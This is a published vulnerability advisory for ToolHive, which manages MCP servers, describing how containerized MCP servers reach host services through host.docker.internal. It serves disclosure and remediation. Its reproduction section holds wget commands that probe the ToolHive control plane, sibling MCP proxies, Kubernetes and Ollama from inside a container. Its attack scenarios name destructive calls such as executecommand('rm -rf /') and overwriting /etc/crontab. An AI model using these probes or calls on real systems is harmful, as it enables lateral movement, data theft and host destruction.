CVE-2026-58197: ToolHive: containerized MCP servers can reach host services via host.docker.internal, enabling lateral movement

Published Sep 18, 2026
·
Updated

Summary

A containerized MCP server running with the default network permission profile (insecureallowall: true) can reach host-local services via host.docker.internal. This includes the ToolHive API itself, other ToolHive-managed MCP server proxies, and any other service listening on the host's localhost. Combined with the unauthenticated ToolHive API and MCP proxy endpoints, this enables a compromised or malicious MCP server to perform lateral movement without any container escape.

Severity

High — This bypasses the container isolation model that is ToolHive's core security value proposition.

Reproduction

All tests performed from inside the filesystem MCP container (docker.io/mcp/filesystem:latest), started with default settings via thv run filesystem -- /tmp.

1. Container can reach the ToolHive control plane MCP endpoint

bash $ docker exec <containerid> wget -qO- \ --header="Content-Type: application/json" \ --header="Accept: application/json" \ --post-data='{"jsonrpc":"2.0","method":"initialize","params":{"protocolVersion":"2025-03-26","capabilities":{},"clientInfo":{"name":"evil-mcp","version":"1.0"}},"id":1}' \ http://host.docker.internal:50444/mcp

Result: Full MCP handshake succeeds: json {"jsonrpc":"2.0","id":1,"result":{"protocolVersion":"2025-03-26","capabilities":{"logging":{},"tools":{}},"serverInfo":{"name":"toolhive-mcp","version":"v0.9.3"}}}

2. Container can connect to another MCP server's proxy and call its tools

bash $ docker exec <containerid> wget -qO- \ --header="Content-Type: application/json" \ --header="Accept: application/json" \ --post-data='{"jsonrpc":"2.0","method":"tools/list","params":{},"id":2}' \ http://host.docker.internal:64965/mcp

Result: Returns the full tool list of the target MCP server (readfile, writefile, editfile, movefile, etc.), and tools can be called:

json {"jsonrpc":"2.0","id":3,"result":{"content":[{"text":"Allowed directories:\n/tmp","type":"text"}]}}

3. Container can reach other host services

bash Kubernetes API $ docker exec <containerid> wget -qO- --no-check-certificate https://host.docker.internal:6443/version {"major":"1","minor":"34","gitVersion":"v1.34.1"...}

Ollama LLM API $ docker exec <containerid> wget -qO- http://host.docker.internal:11434/api/tags {"models":[{"name":"kimi-k2:1t-cloud"...}]}

Attack Scenarios

Scenario 1: Malicious MCP server pivots to privileged native MCP tools

Many users run native (non-containerized) MCP servers like Desktop Commander, terminal servers, or custom tools that have executecommand, writefile, or shell capabilities with full host access. These typically listen on localhost ports. A malicious containerized MCP server can:

1. Port-scan host.docker.internal to discover listening services 2. Attempt MCP handshakes on discovered ports 3. Call privileged tools (e.g., executecommand("rm -rf /") or writefile("/etc/crontab", "..."))

This achieves full host compromise without any container escape vulnerability.

Scenario 2: Compromised MCP server manipulates ToolHive itself

Via the unauthenticated ToolHive MCP endpoint on port 50444, a compromised container could potentially:

- List and stop other running MCP servers (denial of service) - Start new MCP servers with attacker-controlled images - Modify configurations

Scenario 3: Data exfiltration via cross-MCP-server access

A low-privilege MCP server (e.g., sequentialthinking with no file mounts) could reach the filesystem server's proxy and call readfile to access files it was never authorized to see.

Scenario 4: LLM model theft / abuse

As demonstrated, the container can reach Ollama's API and could enumerate models, run inference, or exfiltrate model weights from self-hosted LLMs.

Root Causes

1. insecureallowall: true as default — permits outbound connections to any destination including host.docker.internal 2. No authentication on ToolHive API / MCP proxies — any client that can reach the port can interact fully 3. Docker's host.docker.internal DNS — resolves to the host machine, bypassing localhost-only binding assumptions

Suggested Mitigations

Short-term

- Block host.docker.internal and 172.17.0.1 (Docker gateway) in container networking by default, even when insecureallowall is enabled. These should require explicit opt-in. - Add authentication to MCP proxy endpoints — even a shared secret or token per session would prevent cross-container lateral movement.

Medium-term

- Network policy per container — ToolHive already has the permissionprofile infrastructure. Add support for explicit allow-lists rather than just the binary none/all choice. - Isolate container networks — run each MCP server in its own Docker network with no access to the Docker bridge gateway.

Long-term

- Mutual TLS or token-based auth between ToolHive proxy and containers, so even if network access exists, unauthorized MCP calls are rejected. - Audit logging — log all MCP tool calls with source identification so lateral movement attempts are visible.

Environment

- ToolHive v0.9.3 (macOS desktop app, Docker runtime) - Docker Desktop for Mac (host.docker.internal enabled by default) - Tested with docker.io/mcp/filesystem:latest

Other sources

ToolHive is a utility designed to simplify the deployment and management of Model Context Protocol servers. Prior to ToolHive CLI 0.30.1 and ToolHive Studio 0.38.0, locally run MCP server containers use the default network permission profile without network isolation, permitting access to host.docker.internal while ToolHive API and MCP proxy endpoints are reachable without authentication. A malicious or compromised MCP server can use the Docker gateway to contact host-local services, other ToolHive-managed MCP proxies, or the ToolHive control plane without escaping the container. This access can expose data and logs, invoke sibling MCP tools, alter process or workload state, and disrupt services. ToolHive Studio additionally sends networkisolation as false and overrides the backend's secure isolation default. This issue is fixed in ToolHive CLI 0.30.1 and ToolHive Studio 0.38.0.

MITRE

Affected Software

3 affected componentsFixes available
ToolHive ToolHive CLI<0.30.1
ToolHive ToolHive Studio<0.38.0
go/github.com/stacklok/toolhive<0.30.1
0.30.1

Remediation

Recommended actions to resolve this vulnerability, in priority order.

  1. Upgrade

    Upgrade go/github.com/stacklok/toolhive to a version that resolves this vulnerability.

    Fixed in 0.30.1
  2. Upgrade

    Upgrade ToolHive CLI to a version that resolves this vulnerability.

    Fixed in 0.30.1
  3. Upgrade

    Upgrade ToolHive Studio to a version that resolves this vulnerability.

    Fixed in 0.38.0
  4. Configuration

    Disable the default permissive network permission profile so containers cannot reach host-local services via host.docker.internal/172.17.0.1 unless explicitly allowed (the issue occurs when insecure_allow_all is enabled as default).

    ToolHive network permission profile (insecure_allow_all) insecure_allow_all = false
  5. Configuration

    Set ToolHive Studio network_isolation to true; the text states Studio sends network_isolation as false and overrides the backend's secure isolation default.

    ToolHive Studio network_isolation = true
  6. Configuration

    Require explicit allow-lists (instead of only supporting a binary none/all choice) for outbound access/tools.

    ToolHive MCP proxy authorization explicit allow-list vs none/all = explicit allow-lists
  7. Compensating control

    Block host.docker.internal and 172.17.0.1 (Docker gateway) in container networking by default, even when insecure_allow_all is enabled.

  8. Compensating control

    Isolate container networks: run each MCP server in its own Docker network with no access to the Docker bridge gateway.

  9. Compensating control

    Add authentication to MCP proxy endpoints (e.g., shared secret/token per session) to prevent cross-container lateral movement.

  10. Compensating control

    Enable audit logging for all MCP tool calls including source identification so lateral movement attempts are visible.

Event History

Sep 18, 2026
CVE Published
via MITRE·04:34 PM
Data Sourced
via MITRE·04:34 PM
DescriptionSeverityWeakness
Advisory Published
via GitHub·05:16 PM
Data Sourced
via GitHub·05:16 PM
DescriptionSeverityWeaknessAffected Software

Frequently Asked Questions

1

Which deployments are exposed?

Locally run MCP server containers managed by ToolHive are exposed before ToolHive CLI 0.30.1 and ToolHive Studio 0.38.0 when they use the default network permission profile without network isolation. ToolHive Studio is specifically affected because it sends network_isolation as false, overriding the backend secure-isolation default.

2

What does an attacker need to exploit this issue?

An attacker needs a malicious or compromised MCP server running in an affected ToolHive-managed container. User interaction is required, but the attacker does not need privileges in the affected environment.

3

What can an exploited MCP server reach?

It can use host.docker.internal through the Docker gateway to contact host-local services, other ToolHive-managed MCP proxies, and the ToolHive control plane. The affected ToolHive API and MCP proxy endpoints are reachable without authentication.

4

What is the remediation?

Upgrade ToolHive CLI to 0.30.1 or later and ToolHive Studio to 0.38.0 or later. These versions fix the network-isolation issue.

5

How can I determine whether my environment is affected?

Check whether locally run MCP server containers use ToolHive CLI earlier than 0.30.1 or ToolHive Studio earlier than 0.38.0, and whether they run with the default network permission profile or network_isolation set to false. Such containers may be able to resolve and contact host.docker.internal.

Contact

SecAlerts Pty Ltd.
132 Wickham Terrace
Fortitude Valley,
QLD 4006, Australia
info@secalerts.co
By using SecAlerts services, you agree to our services end-user license agreement. This website is safeguarded by reCAPTCHA and governed by the Google Privacy Policy and Terms of Service. All names, logos, and brands of products are owned by their respective owners, and any usage of these names, logos, and brands for identification purposes only does not imply endorsement. If you possess any content that requires removal, please get in touch with us.
© 2026 SecAlerts Pty Ltd.
ABN: 70 645 966 203, ACN: 645 966 203